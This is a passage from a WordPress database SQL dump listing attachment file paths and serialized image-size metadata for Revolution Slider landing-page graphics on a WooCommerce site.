s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(9700,4592,'_wp_attached_file','revslider/landing-slide1-graphic21.png'),(9701,4592,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:434;s:6:\"height\";i:218;s:4:\"file\";s:38:\"revslider/landing-slide1-graphic21.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic21-300x218.png\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic21-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic21-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic21-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic21-300x218.png\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic21-300x218.png\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic21-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9702,4593,'_wp_attached_file','revslider/landing-slide1-graphic11.png'),(9703,4593,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:561;s:6:\"height\";i:329;s:4:\"file\";s:38:\"revslider/landing-slide1-graphic11.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic11-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic11-300x176.png\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic11-561x300.png\";s:5:\"width\";i:561;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic11-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic11-550x329.png\";s:5:\"width\";i:550;s:6:\"height\";i:329;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic11-550x329.png\";s:5:\"width\";i:550;s:6:\"height\";i:329;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic11-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9704,4594,'_wp_attached_file','revslider/landing-slide1-graphic41.png'),(9705,4594,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:64;s:4:\"file\";s:38:\"revslider/landing-slide1-graphic41.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic41-100x64.png\";s:5:\"width\";i:100;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic41-100x64.png\";s:5:\"width\";i:100;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9706,4595,'_wp_attached_file','revslider/landing-slide1-graphic31.png'),(9707,4595,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:570;s:6:\"height\";i:180;s:4:\"file\";s:38:\"revslider/landing-slide1-graphic31.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic31-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic31-300x95.png\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic31-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic31-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic31-550x180.png\";s:5:\"width\";i:550;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic31-550x180.png\";s:5:\"width\";i:550;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic31-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9708,4596,'_wp_attached_file','revslider/landing-slide1-graphic51.png'),(9709,4596,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:409;s:6:\"height\";i:98;s:4:\"file\";s:38:\"revslider/landing-slide1-graphic51.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic51-300x98.png\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic51-100x98.png\";s:5:\"width\";i:100;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic51-300x72.png\";s:5:\"width\";i:300;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic51-150x98.png\";s:5:\"width\";i:150;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic51-300x98.png\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic51-300x98.png\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic51-100x98.png\";s:5:\"width\";i:100;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9710,4597,'_wp_attached_file','revslider/landing-slide1-graphic71.png'),(9711,4597,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:516;s:6:\"height\";i:305;s:4:\"file\";s:38:\"revslider/landing-slide1-graphic71.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic71-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic71-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic71-300x177.png\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic71-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic71-516x300.png\";s:5:\"width\";i:516;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic71-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic71-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic71-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9712,4598,'_wp_attached_file','revslider/landing-slide1-graphic61.png'),(9713,4598,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:205;s:4:\"file\";s:38:\"revslider/landing-slide1-graphic61.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic61-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic61-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic61-300x170.png\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic61-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic61-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic61-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic61-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9714,4599,'_wp_attached_file','revslider/landing-slide1-graphic81.png'),(9715,4599,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:850;s:6:\"height\";i:150;s:4:\"file\";s:38:\"revslider/landing-slide1-graphic81.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic81-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-600x106.png\";s:5:\"width\";i:600;s:6:\"height\";i:106;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic81-300x53.png\";s:5:\"width\";i:300;s:6:\"height\";i:53;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-768x136.png\";s:5:\"width\";i:768;s:6:\"height\";i:136;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-630x150.png\";s:5:\"width\";i:630;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-550x150.png\";s:5:\"width\";i:550;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-550x150.png\";s:5:\"width\";i:550;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"landing-slide1-graphic81-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-600x106.png\";s:5:\"width\";i:600;s:6:\"height\";i:106;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"landing-slide1-graphic81-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9716,4600,'_wp_attached_file','revslider/landing-brown-31.png'),(9717,4600,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:453;s:6:\"height\";i:480;s:4:\"file\";s:30:\"revslider/landing-brown-31.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"landing-brown-31-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"landing-brown-31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"landing-brown-31-283x300.png\";s:5:\"width\";i:283;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"landing-brown-31-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"landing-brown-31-453x300.png\";s:5:\"width\";i:453;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"landing-brown-31-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"landing-brown-31-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"landing-brown-31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9718,4601,'_wp_attached_file','revslider/landing-brown-21.jpg'),(9719,4601,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:678;s:6:\"height\";i:433;s:4:\"file\";s:30:\"revslider/landing-brown-21.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"landing-brown-21-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"landing-brown-21-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"landing-brown-21-600x383.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:383;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"landing-brown-21-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"landing-brown-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"landing-brown-21-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"landing-brown-21-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"landing-brown-21-550x433.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"landing-brown-21-550x433.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"landing-brown-21-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"landing-brown-21-600x383.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:383;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"landing-brown-21-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9720,4602,'_wp_attached_file','revslider/sh-single-landing1.png'),(9721,4602,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:717;s:6:\"height\";i:432;s:4:\"file\";s:32:\"revslider/sh-single-landing1.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"sh-single-landing1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"sh-single-landing1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"sh-single-landing1-600x362.png\";s:5:\"width\";i:600;s:6:\"height\";i:362;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"sh-single-landing1-300x181.png\";s:5:\"width\";i:300;s:6:\"height\";i:181;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"sh-single-landing1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"sh-single-landing1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"sh-single-landing1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"sh-single-landing1-550x432.png\";s:5:\"width\";i:550;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"sh-single-landing1-550x432.png\";s:5:\"width\";i:550;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"sh-single-landing1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"sh-single-landing1-600x362.png\";s:5:\"width\";i:600;s:6:\"height\";i:362;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"sh-single-landing1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9722,4603,'_wp_attached_file','revslider/landing-footer-img21.png'),(9723,4603,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:199;s:6:\"height\";i:185;s:4:\"file\";s:34:\"revslider/landing-footer-img21.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-footer-img21-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thu